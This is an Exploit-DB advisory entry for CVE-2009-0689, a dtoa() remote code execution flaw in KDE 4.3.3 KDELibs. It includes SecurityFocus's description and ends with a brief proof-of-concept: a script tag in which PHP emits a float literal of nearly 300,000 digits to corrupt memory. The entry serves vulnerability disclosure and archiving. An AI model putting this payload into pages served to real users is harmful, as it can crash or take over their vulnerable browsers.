KDE 4.3.3 KDELibs 'dtoa' Remote Code Execution Vulnerability

2009-11-20T00:00:00
ID EDB-ID:33364
Type exploitdb
Reporter Maksymilian Arciemowicz
Modified 2009-11-20T00:00:00

Description

KDE 4.3.3 KDELibs 'dtoa()' Remote Code Execution Vulnerability. CVE-2009-0689. Remote exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/37080/info

KDE is prone to a remote code-execution vulnerability that affects KDELibs.

Successful exploits may allow an attacker to execute arbitrary code. Failed attacks may cause denial-of-service conditions.

NOTE: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.

This issue affects KDE KDELibs 4.3.3; other versions may also be affected.

<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>